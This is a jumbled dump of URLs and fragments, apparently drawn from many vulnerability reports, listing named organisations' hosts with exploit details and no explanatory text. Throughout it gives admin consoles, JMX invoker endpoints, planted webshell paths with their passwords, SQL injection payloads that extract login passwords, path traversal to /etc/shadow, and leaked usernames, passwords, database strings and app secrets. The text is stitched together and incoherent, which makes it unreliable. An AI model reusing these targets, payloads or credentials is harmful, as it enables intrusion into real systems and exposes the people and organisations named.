http://nv200.zznissan.com.cn/admin/console/?c=login&a=log http://patrol.zznissan.com.cn/admin/console/?c=login&a=log http://qinghai.zznissan.com.cn/admin/console/?c=login&a=log http://shandong.zznissan.com.cn/admin/console/?c=login&a=log http://shanghai.zznissan.com.cn/admin/console/?c=login&a=log http://shanxi.zznissan.com.cn/admin/console/?c=login&a=log http://sichuan.zznissan.com.cn/admin/console/?c=login&a=log http://spv.zznissan.com.cn/admin/console/?c=login&a=log http://sx.zznissan.com.cn/admin/console/?c=login&a=log http://tianjin.zznissan.com.cn/admin/console/?c=login&a=log http://zhejiang.zznissan.com.cn/admin/console/?c=login&a=log http://yunnan.zznissan.com.cn/admin/console/?c=login&a=log http://xizang.zznissan.com.cn/admin/console/?c=login&a=log http://xinjiang.zznissan.com.cn/admin/console/?c=login&a=log http://fujian.zznissan.com.cn http://218.16.100.212:8080/gionee/weibo/imeiManager!list无须登录可直接访问 http://csse.szu.edu.cn/zk/admin/signin http://**.**.**.**/show.asp?id=43 http://**.**.**.**/admin/admin_index.asp http://xxx.com/rock.php?a=loadinfor&m=userinfor&d=humanres&id=1&ajaxbool=true http://xxx.com/rock.php?a=getsysfilod&m=dir&d=system&ajaxbool=true http://xxx.com/rock.php?a=getfile&m=dir&d=system&ajaxbool=true http://xxx.com/rock.php?a=open&m=dir&d=system&ajaxbool=true&path=webrock/webrockConfig.php http://demo.rockoa.com/upload/2015-12/27_0202571895.jpg http://demo.rockoa.com/upload/2015-12/123.php,passwd:wooyun,请及时删除 http://demo.rockoa.com/重现 http://**.**.**.**/communion,看到有留言功能,就顺手丢了一个xss,过了几天登陆xss平台就收到了xss,明明绑定了邮箱却不通知。这个平台。。好吧说正题。来截张图 http://**.**.**.**/uploads/Dy/soft/151226/shell.php,http://**.**.**.**/include/taglib/test1.lib.php,密码都是shell,可以测试下 http://www.vzoom.com/vzoom/initIndex.action https://**.**.**.**/dalinhuang/ashural-asset/blob/5f9c2b9fbc001ba28519b3489c2cdab094ca610b/AutoVersion/ant-scripts/build-autoversion.xml http://**.**.**.**/ http://agt.ehuatai.com/Login.aspx http://**.**.**.**/erp/mqq/jsp/mqqjInfo.jsp?compId=A&projectNo=ZP12030074* http://**.**.**.**/info.asp?id=436 http://**.**.**.**/admin url:http://api.xiyou.cntv.cn/activity/lists?pid=100&format=json&type=web http://hk.dfzq.com.cn:82 http://hk.dfzq.com.cn:82/uddiexplorer/33ss.jsp http://hk.dfzq.com.cn:82/uddiexplorer/out.jsp http://10.254.1.31 http://10.254.1.28 http://10.254.1.26 http://10.254.1.61 http://10.254.1.51 http://10.254.1.50 http://10.254.1.34 http://10.254.1.111 http://10.254.1.104 http://**.**.**.**/simp/product_list.asp?type_id=2&product_id= http://**.**.**.**/simp/product_list.asp?type_id=1 https://**.**.**.**/index.php?_room=12&_action=detail&gallery_id=408 http://121.35.255.78:7001/mbp/login.jsp system:service=MainDeployer http://**.**.**.**/is.war http://www.hglx.sdu.edu.cn/article.php?id=764 http://www.dljx.ecnu.edu.cn/content.php?tid=2 http://222.18.15.135/jiuye/shownews.php?type_id=5&newsid=1 http://1.85.2.244/OC_Manager/ http://1.85.2.244/uddiexplorer/22ss.jsp jdbc:oracle:thin:@**.**.**.**:1521:orc1 http://bj.zufangzi.com/order/ownerEntrustController/toEntrust.do发布房源 http://**.**.**.**/ http://dl4.lib.tongji.edu.cn/search/showdetail.aspx?rsid=b4d52eca-087d-455b-9403-d37624f61146&docid=10136&title=%E4%B8%8A%E6%B5%B7%E6%8E%A8%E5%B9%BF%E7%94%B5%E5%8A%A8%E6%B1%BD%E8%BD%A6%E5%88%86%E6%97%B6%E7%A7%9F%E8%B5%81%E8%BF%90%E8%90%A5%E6%A8%A1%E5%BC%8F http://**.**.**.**/webcms/index!index.action http://**.**.**.** http://maila.faw.com.cn/ http://mail3.jf.faw.com.cn/ http://fawcustoms.faw.com.cn/system/login.jsp http://iecoa.faw.com.cn/ http://114.251.99.158/login.aspx http://114.251.99.158 http://**.**.**.**/ga/ http://115.231.106.245:9200/ http://www.bufsun.com http://**.**.**.** https://221.231.143.159 www.njzq.com.cn http://**.**.**.**/kjc_notice/main_readnotice.asp?id=8a8889a0504ad14d01516bab606c584e http://**.**.**.**/的子站。 jdbc:oracle:thin:@**.**.**.**:1521:orcl http://project.kuxun.cn:8080 https://mail.tuniu.com/owa/ https://218.94.7.120/prx/000/http/localhost/login http://219.141.188.21:8088/inter?active=inter# http://sys.cashchina.cn/ http://risk.cashchina.cn/ http://fin.cashchina.cn/ http://sys.cashchina.cn/GetPassword/Find.aspx http://**.**.**.**/beian/tongji/rep_hangqing.aspx?year=&month=12&day=26 http://d.huxiu.com/ http://kf.shengli.com/search/index/keyword/23*/p/2.html http://123.125.112.41/dfshealth.html#tab-overview http://passport.chinahr.com/pc/findPwd http://58.249.117.85:8080/portal/pages/index.jsp http://202.108.103.193:9003/ http://202.108.103.193:9001/index.jsp http://202.108.103.193:9002/index.jsp http://202.108.103.193:9003/admin-console/login.seam?conversationId=26 http://202.108.103.193:9003/ma/ma3.jsp http://202.108.103.193:9003/jmx-console/ http://202.108.103.193:9003/invoker/JMXInvokerServlet http://219.146.73.92:7003/ http://219.146.73.92:7003/uddiexplorer/33ss.jsp http://219.146.73.92:7003/uddiexplorer/out.jsp http://114.242.218.150/ http://114.242.218.150/uddiexplorer/ss.jsp http://edu.shangdu.com/ikaimi/showajax.php?id=231705 http://www.baopal.com:7001/jmx-console/ http://www.baopal.com:7001/invoker/JMXInvokerServlet system:type=ServerInfo http://www.baopal.com:7001/invoker/JMXInvokerServlet system:service=MainDeployer http://www.XXOO.cn/js/test.war http://101.227.240.110:8989/baf/jsp/uiframe/login.jsp http://**.**.**.**/jmclove/index.php/news/detail/id/438* jdbc:microsoft:sqlserver**.**.**.**:1433;databasename=jacbus http://**.**.**.**:7001/portal/homePage.jsp http://**.**.**.**:8081/ a855:6cdb:8d11:2566%11 pw:pa55w0rd http://**.**.**.**/ http://**.**.**.**/sd1114820/member_pm.php http://**.**.**.**//uploads/allimg/151227/1_1845492081.php http://**.**.**.**/Default.aspx?ScriptManager1_HiddenField=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExNjE1MDYwMzRkZAjLSPQnTGBSgRpVHH5Qps6VXZMs&tbUserN=1111&tbPassW=11111&btnOK=%E7%99%BB%E5%BD%95&__EVENTVALIDATION=%2FwEWBgLziPOXAgKK%2FdqNAwKcnri7CQLdkpmPAQKEk6mOAQKLk6mvAiiJLXwVnpmfTrFvgKW8E%2FpkCOhO http://211.147.87.211:7002/ http://211.147.87.211/login.aspx http://211.147.87.211:7002/uddiexplorer/ss.jsp http://211.147.87.211:7002/uddiexplorer/out.jsp http://dzp.e23.cn C535F5327C233C473E3E501614565299:FG=1 http://110.e23.cn http://**.**.**.**/ http://**.**.**.**/cw/skin1/jsp/download.jsp?file=../../../../etc/shadow http://**.**.**.**/)存在SQL注入、后台未授权访问、多处XSS漏洞。 http://exam.kingdee.com/mana/edit/attach_upload.jsp http://122.193.9.66 http://www.1gw.com http://**.**.**.**/information.php?InfoID=1963 http://**.**.**.**/webmail/index.php?module=view&action=login f55b:b469:4fd6:3c9c%20 ab4a:6471:d6f6%15 fc17:1831:5720:3a84%13 c058:6301::c058:6301 http://member.bilibili.com/#gl_manage http://cms.php.administrator.cctvmall.com http://114.242.218.117:8088/ http://114.242.218.117:8088/uddiexplorer/22ss.jsp http://114.242.218.117:8088/uddiexplorer/out.jsp http://400.fang.com/dongtao.php?city=bj&newcode=123&type=dong http://**.**.**.**/ShowFunction.aspx?fybm=51 http://221.8.57.110/i-card/getCardVersionAction.action http://221.8.57.110/uddiexplorer/44ss.jsp http://221.8.57.110/uddiexplorer/out.jsp pwd:Wooyun123 http://113.108.182.3:19244 http://**.**.**.**:8019 http://**.**.**.**:8019/SLClient.aspx?id=83b82137-76ef-402c-b204-0c6b37563020 http://go.sogou.com/hotel/WEB-INF/web.xml http://go.sogou.com/zt/WEB-INF/web.xml http://go.sogou.com/tejia/WEB-INF/web.xml http://go.sogou.com/plane/WEB-INF/web.xml http://**.**.**.**:8081//tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/null上传的文件名.jsp http://jj.youc.com http://117.34.12.17/manage/logon.jsp http://zbn.e23.cn http://**.**.**.**/shop/admin/login.jhtml http://zz.youc.com http://**.**.**.** http://**.**.**.**/pro_info.php?rid=653 http://113.108.182.3:22580/login.jsp http://**.**.**.**/index.php?act=member&op=address&type=edit&id=218 http://www.shwnjxc.com:84 http://**.**.**.** http://www.myfund.com/apptuiuguang/myfundindex.html http://app.myfund.com:8484/Service/DemoService.svc/GetUserInfo?UserName=18888888888& http://app.myfund.com:8484/Service/DemoService.svc/GetUserInfo?UserName=liyan& http://**.**.**.**/ http://**.**.**.**/Orders.aspx?ser=1&state=0&field=name&key=1 http://**.**.**.**/ https://117.39.30.5/por/login_psw.csp?rnd=0.7774858681950718 http://www.fengyunlive.com/play/ http://www.fengyunlive.com/play/manager/playinfo?cid= http://www.fengyunlive.com/channel-list http://www.fengyunlive.com/tv/236_1375092311246.htm http://www.fengyunlive.com/play/manager/playinfo?cid=236_1375092311246 http://act.wildstar.ztgame.com/database http://act.wildstar.ztgame.com/sign/addsign.php?callback=jQuery172042374535487033427_1451238002410&zt_account=998&_=1451238039075 http://222.90.136.116:8080//jmx-console/ http://222.90.136.116:8080//invoker/JMXInvokerServlet http://www.njude.com.cn/xc/s_dist.asp?id=7368585&type=a http://gksx.free.ezvpn.cn:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 https://**.**.**.**/findpwd.aspx http://**.**.**.**/KCMS/detail/detail.aspx?filename=1011088096.nh&dbcode=CMFD&dbname=CMFD2011 http://**.**.**.**:801/upLoad/users/51463/Papers/2014-12/201412191442379833.docx http://www.zhihuiya.com/.git/config http://www.patsnapglobal.com/.git/config ssh://git@code.patsnap.com:5822/inno/company-website.git http://news.patsnap.com/app.zip http://analytics.patsnap.com/ http://analytics.patsnap.com/ http://221.224.11.234:8888/aaaaaaa http://221.224.11.234:28780/ http://221.224.11.234:28780/repositories/ http://insights.patsnap.com/ http://insights.patsnap.com/create http://221.224.11.234:8888/test.php http://testlink.patsnap.com/ http://t.patsnap.com/ http://data.patsnap.com/ file:/opt/jetty/work/jetty-0.0.0.0-8080-data-api.war-_data-api-any-/webapp/,AVAILABLE}{/data-api.war file:/opt/jetty/work/jetty-0.0.0.0-8080-machine-translation-api.war-_machine-translation-api-any-/webapp/,AVAILABLE}{/machine-translation-api.war file:/opt/jetty/work/jetty-0.0.0.0-8080-search-api.war-_search-api-any-/webapp/,AVAILABLE}{/search-api.war http://export.patsnap.com/ file:/tmp/jetty-0.0.0.0-8080-export-service-Rel.3.0.12.war-_export-service-Rel.3.0.12-any-5022217990294658891.dir/webapp/,AVAILABLE}{/export-service-Rel.3.0.12.war https://github.com/ieiayaobb/fluidOS/blob/e5755d5f3ccd2c1af4629474568476add5b28b4c/fluidos-service/src/main/resources/git.properties code.patsnap.com/patsnap-services/storage.git http://**.**.**.**/bugs/wooyun-2010-0128322 http://www.chanhen.com:801//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://114.80.122.212:8080/jenkins/ https://github.com/blackye/Jenkins User:zengxiaomin Password:123456 User:wangqian Password:wangqian123 http://218.5.65.218:8080/ redis_version:2.1.4 redis_git_sha1:00000000 multiplexing_api:winsock2 process_id:4788 uptime_in_seconds:470 lru_clock:425121 used_cpu_sys:0.02 used_cpu_user:0.08 used_cpu_sys_childrens:0.00 used_cpu_user_childrens:0.00 used_memory:425972 used_memory_human:415.99K mem_fragmentation_ratio:0.00 last_save_time:1451285625 hash_max_zipmap_value:512 role:master db0:keys=2,expires=0 http://**.**.**.**/index.php?s=/mba/index/search.html http://202.102.251.187:8090/admin/login.web存在Struts2命令执行漏洞,最终拿到服务器shell。 http://**.**.**.** http://store.ticwear.com/pages/info https://github.com/yb989/infcenter/blob/872d63dbd49b54aced249fc0eb9cd20ef24d6ca7/new_infcenter/.svn/pristine/80/8085974cb049d6c9438e59c0a773c321b11e7f08.svn-base https://**.**.**.**/main.php?id=279&lan=c http://channel.360.cn/frontnotice/list?list_id=1 http://222.247.38.221/admin/login_login.action http://**.**.**.**/pingyi/zmhd_ht/bm_login.aspx http://tg.youc.com/index.php?r=wowka-nvshen http://www.sydoil.com/services_detail.asp?id=1629 http://www.sydoil.com/services_detail.asp?id=1629 http://www.sydoil.com/services_detail.asp?id=1629 http://www.sydoil.com/services_detail.asp?id=1629” http://www.sydoil.com/services_detail.asp?id=1629” http://www.sydoil.com/services_detail.asp?id=1629” http://fenrunv2.dld.com/admin/login/login http://my.fund123.cn http://av.youc.com http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/index/index.action由于struts2漏洞,导致网站getshell。 http://hr.cnht.com.cn:11000/ehr/login.jspa http://hr.cnht.com.cn:9090/ http://zxbx.cnht.com.cn:8956/ http://oa.cnht.com.cn:9060/login.jsp;jsessionid=C3A85107580B1557E64AB050E69320F2 http://oa.cnht.com.cn:9050/ http://email.cnht.com.cn:8686/ http://zxbx.cnht.com.cn:19080/zxbx/index.jsp http://oa.cnht.com.cn:9050/ http://hcm.yonyou.com http://**.**.**.** http://**.**.**.**/news_intro.aspx?news_id=549&fatherid=261 http://**.**.**.**/ecdomain/framework/RHIN_health/index.jsp http://pay.th010.com/ http://feedback.wps.cn/client http://202.104.30.94 http://202.104.30.94/she11.jsp?o=vLogin http://oa.cnht.com.cn:9060/ http://**.**.**.**/ http://**.**.**.**/doc/info/index.php?cata=11010 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ https://**.**.**.**/grrey/thinglinx_node_console/blob/7d6ad5e9c9fd189b95ea1dead5672dbe827c6b4b/thinglinx.config.js ASSERT:galaxyl9t http://**.**.**.**/web.zip http://ad.easou.com/ http://**.**.**.**/qtcpInfo.jsp?id=6 http://**.**.**.**/syadmin/login.aspx http://**.**.**.**/companyInfo!login.action https://**.**.**.**/satanfire/project/blob/c3174fe857f2a6c68d61291c5402fbcc29f6276a/front/iDSP-frontend-adx/src/main/resources/mail.properties http://h5.cmge.com/cmge_wap/indexWap!search?keyword=e http://gksx.free.ezvpn.cn:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**/ResLib/register/login.aspx http://lbtest.byd.com.cn/DMS_TEST/ http://219.134.188.39/DMS_TEST/ http://219.134.188.39/uddiexplorer/55ss.jsp http://lbtest.byd.com.cn/uddiexplorer/55ss.jsp jdbc:oracle:thin:@**.**.**.**:1521:testdb3 http://elite.aviva-cofco.com.cn/aclec/carouselFigure/findEcPic.do http://sales.aviva-cofco.com.cn/online/discount/discount.do http://sales.aviva-cofco.com.cn:9080/mobile/policyManage/callPrem.do http://elite.aviva-cofco.com.cn/aclec/cssroot.jsp?o=vLogin http://wooyun.org/bugs/wooyun-2015-0164282 http://61.163.100.203:8080 http://**.**.**.**/ https://github.com/zth390872451/java/blob/a56fd1edcd14a5b80812ed689f0ded2da9ec3eec/Platform/conf/cc.mail/.svn/text-base/beauty.properties.svn-base http://wh.chinac.com/user_toLogin.html http://**.**.**.**/ http://**.**.**.** https://github.com/xienan89/test-projects/blob/1762c0760647aa2ffe5f847261362c20118bb88a/just-for-test2/src/main/java/com/xienan/mail/Mail.java http://**.**.**.**/ http://**.**.**.** http://library.ouc.edu.cn/Result.aspx http://e-learning.qzccbank.com/lds/sys_logout.do http://cloud.ouc.edu.cn/graduEnroll/index.php?title=%E9%A6%96%E9%A1%B5 http://www.qianxs.com http://**.**.**.**/manager/ItemList.aspx http://**.**.**.**/ http://**.**.**.**/?app=member.member&act=lostp1 http://61.147.80.119/dadi/ http://61.147.80.119/dadi/she11.jsp?o=vLogin http://**.**.**.** http://180.213.5.16:7003/sunLifeConsole/ http://youth.sicnu.edu.cn/stuol/mail.php?do=browse&id=4169 http://www.doyouhike.net/group/group_list/?style=-1 http://**.**.**.**/about/company/intro/default.aspx,如图所示: http://**.**.**.**:8080/oaweb/,如图所示: http://400.track.yingxiong.com/index.do http://61.187.87.92:7001/duizhang/she22.jsp http://222.168.65.208/login.jsp http://hoo.koofang.com https://**.**.**.**/login.aspx http://**.**.**.**/couponwine.aspx?key=1 http://**.**.**.**/integral.aspx?key=1 http://**.**.**.**/cash.aspx?key=1 http://**.**.**.**/coupon.aspx?key=1 http://**.**.**.**/couponwine.aspx?key=1';WAITFOR http://**.**.**.**/couponwine.aspx?key=1';WAITFOR http://**.**.**.**/couponwine.aspx?key=1';WAITFOR https://222.249.130.131/prx/000/http/localhost/login http://euniv.zte.com.cn/ http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/Web/Function/Common/ArticleDetail.aspx?ArticleID=f9deffd2-60d7-4120-adc8-d9ea7707c5d5 http://**.**.**.**/viewnews.asp?id=4540 http://**.**.**.**/admin/denglu.htm http://a6.gykghn.com:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://game.sports.sina.com.cn/chaoti_events/wyx_2015_christmas_event/deal.php http://test.com/?http://game.sports.sina.com.cn/chaoti_events/wyx_2015_christmas_event/ http://game.weibo.com/avatar/interface/shareWeibo http://game.weibo.com.test.com/avatar/home/?origin=2182 http://game.weibo.com/avatar/events/shareTaskWeibo http://test.com/?http://game.weibo.com/avatar/home/?origin=2182 http://dr.wenwo.com/popular/indexActivityshare http://dr.wenwo.com/popular/indexActivityshare http://test.com http://58.56.60.68:8088/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://**.**.**.**/ http://**.**.**.**/product.php?cat=11&id=22 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/setup/DBManage.aspx https://ticket.wuhan.wandamoviepark.com/LogIn/Index https://ticket.wuhan.wandamoviepark.com/LogIn/getLoginCode jdbc:oracle:thin:@**.**.**.**:1521:tstdbs http://**.**.**.**:80/ http://www.doyouhike.net/forum/globe/2334245,0,0,0.html www.doyouhike.net http://www.doyouhike.net http://**.**.**.**/ http://**.**.**.**:8080/ees/test.jsp http://**.**.**.**/ http://**.**.**.**/main/adminindex.jsp http://**.**.**.**/download/ http://**.**.**.**/download/1038832014-07-24164916.csv http://**.**.**.**/ http://www.allinpay.com/httpHandler.php?Handler.Default.SendSpecialMerchants http://**.**.**.**/一个分站在内网的 http://**.**.**.**/userfiles/遍历目录发现小马 http://**.**.**.**/userfiles/1.asp;.jpg根据这个可以得到另个小马mima http://**.**.**.**/userfiles/1.asp http://**.**.**.**:7001/defaultroot/desktop.jsp# http://**.**.**.**/ http://**.**.**.**/api/users/1/followings www.doyouhike.net http://www.doyouhike.net http://www.leadong.com/order-detail.html?orderId=RpAfUKfpAIaj http://www.ztekj.com/login.jsp登录页面上发现了一个POST型注入。就是下面的type参数。 http://www.ztekj.com/login.jsp http://**.**.**.**/ http://**.**.**.**:8060/ http://wooyun.org/bugs/wooyun-2010-0164690 http://**.**.**.**:7002/ http://onesdk.baidu-mgame.com/onesdk/ http://jk.qianxs.com相似存在openssl的系统 http://210.14.78.153/ http://opinion.e23.cn/hot?k=1 http://**.**.**.**/f-0-IHY_MLU_S4J_KDL_58V-0-0.html?sort=3#ref=all&po=guide_kw000 http://**.**.**.**/bugs/wooyun-2015-0131701) https://github.com/qict777/oscarhhb/blob/master/getip.py http://www.muzhiwan.com/index.php?action=album&opt=getAlbum&aid=4775 http://www.muzhiwan.com/index.php?action=album&opt=getAlbum&aid=4775/*!and*/1=1 http://www.muzhiwan.com/index.php?action=album&opt=getAlbum&aid=4775/*!and*/1=11 http://oauth.tops001.com http://oa.sinopharm.com/seeyon/ http://oa.sinopharm.com/seeyon/management/index.jsp http://oa.sinopharm.com/seeyon/logs/login.log https://**.**.**.**/nthuad.php?pid=402 http://www.jxlife.com.cn/cssroot.jsp http://sales.jxlife.com.cn/cssroot.jsp http://wap.jxlife.com.cn/cssroot.jsp http://service.jxlife.com.cn/cssroot.jsp http://www.jxlife.com.cn/clauseManage/query.do http://sales.jxlife.com.cn/customer/createImage.do http://wap.jxlife.com.cn/mobilePolicy/insuredEntry.do http://service.jxlife.com.cn/customer/createImage.do http://zhidao.baidu.com/question/137190521709533965 http://home.1905.com/robots.txt/.php http://home.1905.com/attachment/201512/18/4580762_1450417652l9ad.jpg/.php http://sso.haier.net/cas/login http://sso.haier.net http://**.**.**.**/ http://218.5.65.215:8080/yyoa/ http://218.5.65.215:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://**.**.**.**/login.jsp https://github.com/torry999/lingshi/blob/ac628f6cb16697defe2be524254b6b6b97bcc26b/Application/Common/Common/function.php http://**.**.**.**:7003/ccsbweb/login.jsp),IP地址是:**.**.**.**,系统由四川久远银海软件股份有限公司开发,该存在Java反序列化漏洞(已实现上传/远程命令执行)。 http://**.**.**.** https://mp.weixin.qq.com/ https://mp.weixin.qq.com/cgi-bin/home?t=home/index&lang=zh_CN&token=1063348626 http://sync.meizu.com:80/download/etc/passwd http://sync.meizu.com:80/download/etc/shadow GmQ0:1***** https://github.com/andaok/python/blob/9c21f8cdaa4cc4d5b25356ff18af953ee197c3c9/mod/mod_email/SendMail.py https://github.com/AntDream/cchome/blob/b8920304736660db28b33ae3c2c1b8a86124a7ca/admin/src/main/resources/init.properties jdbc:mysql://559d09f7c9dd7.gz.cdb.myqcloud.com:18059/cchome?useUnicode=true&characterEncoding=utf-8 jdbc:mysql://127.0.0.1:3306/cchome?useUnicode=true&characterEncoding=utf-8 jdbc:mysql://120.132.51.188:2101/msds_zc?createDatabaseIfNotExist=true&useUnicode=true&characterEncoding=utf-8&autoReconnect=true http://www.doyouhike.net/user/3/visited http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/nulltest.jsp http://**.**.**.**/login.action http://**.**.**.**/admin/teacher/file/down.php?filename=../../include/config.php http://**.**.**.**/ http://ski-ana.nwpu.edu.cn/ http://**.**.**.**/uploads/ https://github.com/MarkWh1te/Mytest/blob/66f8c9b3376be94b2dcb3f5b576ada88d8109b0d/fun/test.py http://**.**.**.**/index.php?s=/admin http://**.**.**.**/tw/products.php?Main_ID=2&Sec_ID=0 http://**.**.**.**/index.php?s=/Home/User/login.html http://oa.gykgnmg.com/yyoa/ http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=productlist http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=orderdetail&oid=1444183622 http://wooyun.org/bugs/wooyun-2010-0164337 https://123.103.6.250 http://172.18.4.208:8080/ http://172.18.4.70:8080/script http://172.18.2.108:8080/script http://172.18.4.145:8080/ http://172.18.4.169:8080/ http://172.18.4.210:8080/ http://172.18.4.212:8080/ http://172.18.4.214:8080/ http://172.18.4.216:8080/script http://172.18.24.62:8081/nexus http://rundeckinteali.ops.chanjet.com.cn http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan/ http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan_imp/ http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan_mobile/ http://jenkins.rd.chanjet.com/view/%E4%BB%A3%E7%A0%81%E7%BB%9F%E8%AE%A1/job/gongzuoquan_web/ dcff:6198%14 da2:bc8a:af97:6f59%13 http://**.**.**.**/news/Hodel/UserData.ashx?UserNameJtl=1 https://222.73.60.3 ftp:oracle/oracle telnet:oracle/oracle http://www.doyouhike.net/dest/tongling-wuhuashan-cycling#routeCmtBox http://www.doyouhike.net/dest/songshanhuhuanhu-cycling http://www.doyouhike.net/dest/guangzhouyingguxian-hiking URL:https://**.**.**.**/ https://**.**.**.**/essframe http://loan.tops001.com/ http://oauth.tops001.com/Login.html进行身份验证。 http://oauth.tops001.com/Login.html可撞库。用常用用户名和弱口令123456可获得一些账号。 https://**.**.**.**/liuli1735/workspace/blob/df8b94aa7821173fcbaa79f4a862696130dd3342/R/.Rhistory uuid:o79Eh4KdajO6cBuOs04OgQ\=\= uuid:RXFFr8vKQJmR7j0ikc070A\=\= uuid:MrtE1M1qBKUWnr4diT95Wg\=\= uuid:1kFLXf1tdSSivMydoZsfLQ\=\= uuid:MrtE1M1qBKUWnr4diT95Wg\=\= uuid:e8VJSGK71Z/Fr5neiVfsAw\=\= BLOWFISH:EC049C62E1D2C5435654493D uuid:1kFLXf1tdSSivMydoZsfLQ\=\= uuid:RXFFr8vKQJmR7j0ikc070A\=\= http://**.**.**.**:8088/cas/login?service=http%3A%2F%2F**.**.**.**%2Findex.jsp https://github.com/mrwangx/rwgl/blob/14e61a97ffc22ef5ddf701cd50dc956c6e318e3f/routes/mail.js http://**.**.**.**/CMS/Default.aspx https://github.com/chaletli2014/rhinocort/blob/cb9e1e7c7aed34cf2b3d19d0ff384f840ec501b5/WebContent/WEB-INF/config/system.properties email_pwd:Sd123456 http://**.**.**.**/news2.aspx?id=276 http://tcoa.jf.faw.com.cn/names.nsf?Login http://wiki.spider.com.cn/ http://hk5.midea.com/add.php?cat=31&id=16&lang=1&lang_dir=c&line=594&pid=591 http://**.**.**.**:99/login/Login.jsp?logintype=1 http://**.**.**.**:99//pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**:99//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager www.sto.cn http://**.**.**.** http://**.**.**.**/site/home/tyu/index-Marketing.php?Company_SN=17741&v=1 http://**.**.**.**/ http://**.**.**.**:7001/WebModule1/index.jsp http://**.**.**.**/ http://**.**.**.**:7001/console/ jdbc:oracle:thin:@**.**.**.**:1521:medicare http://weixin.uestcedu.com/weixin_get_user.do?jsoncallback=jsonp1451373897565&_=1451373898320&user_id=0291241&user_type=student&appkey=925003&appsecret=667a99fec582456a9197042e530b2224&ran=0.25382562211445914 http://n62.cnhubei.com/logic/?id=5 http://mihua.net/mihua.zip http://mail.huatu.com http://www.sinopharm-sd.com http://58.56.60.68:8009/websale/empLogin.aspx http://58.56.60.68:8088/yyoa/index.jsp http://58.56.60.68/lxcx/tc_ghs_login.asp http://58.56.60.68/EYJ/querychkrpt.aspx http://www.sinopharm-sd.com/News.aspx?smallclassid=1 http://www.sinopharm-sd.com/About.aspx?smallclassid=8 http://www.sinopharm-sd.com/Tel.aspx?smallclassid=5 http://www.sinopharm-sd.com/Contact.aspx?smallclassid=14 http://www.sinopharm-sd.com/Map.aspx?smallclassid=19 http://www.sinopharm-sd.com/Yingpin.aspx?ID=13 http://www.sinopharm-sd.com/MedicinePage.aspx?smallclassid=40 http://www.sinopharm-sd.com/ifxinxi.aspx?cityid=2 http://www.sinopharm-sd.com/News.aspx?smallclassid=1 http://m2.qiushibaike.com/article/list/image www.doyouhike.net http://www.doyouhike.net http://**.**.**.**/base/Login.aspx http://**.**.**.**:8080 http://www.doyouhike.net/route/go_add_base http://admin.doyouhike.net/index.php/file/index index.php/file/index http://**.**.**.**/site/news/title/detail.php?Company_SN=17741&Site_News_SN=3135&PHPSESSID=uvvs54til40602ha3e29qibqu2 http://**.**.**.**/site/news/title/detail.php?Company_SN=17741&Site_News_SN=3135%20and%20updatexml%281,concat%280x7e,user%28%29%29,1%29&PHPSESSID=uvvs54til40602ha3e29qibqu2 http://www.vinvest.com.cn/updatePwd.do http://android.myapp.com/myapp/detail.htm?apkName=com.kakao.topbroker http://corp.1disk.cn/show.aspx?filepath=1&type=1 http://kg.ouc.edu.cn/ http://kg.ouc.edu.cn/dproot/admin/login.php http://kg.ouc.edu.cn/dproot/ http://kg.ouc.edu.cn/dproot/_dpconf/sys_xml/table_my.config http://**.**.**.**/ http://202.108.145.58/default/ http://202.108.145.58/sso-server/she11.jsp?o=vLogin jdbc:oracle:thin:@172.16.1.13:1521:ntoptest http://172.16.1.12 http://172.16.1.13 http://172.16.1.84 http://172.16.1.37 http://172.16.1.94 http://172.16.1.66 http://218.5.65.215:8080/yyoa/ http://218.5.65.215:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**/about/page.php?id=457 http://wooyun.org/bugs/wooyun-2015-0161215 http://121.8.153.27:8813 http://moa.gf.com.cn:8813 http://121.8.153.27:8813/11ss.jsp http://moa.gf.com.cn:8813/11ss.jsp http://a6.gykghn.com:8080/yyoa/checkWaitdo.jsp?userID=1 http://idc1.72e.net/register.aspx?t=2&v=sample%40email.tst&_=1451338589703 http://**.**.**.**/ http://epaper.**.**.**.**/html/2015-12/29/node_21.htm http://**.**.**.**/html/2015-12/29/node_21.htm http://**.**.**.**:7001/console http://**.**.**.**:7001/newsedit/ http://**.**.**.**:7001/newsedit/e5workspace/Login.jsp jdbc:sqlserver://**.**.**.**:1433 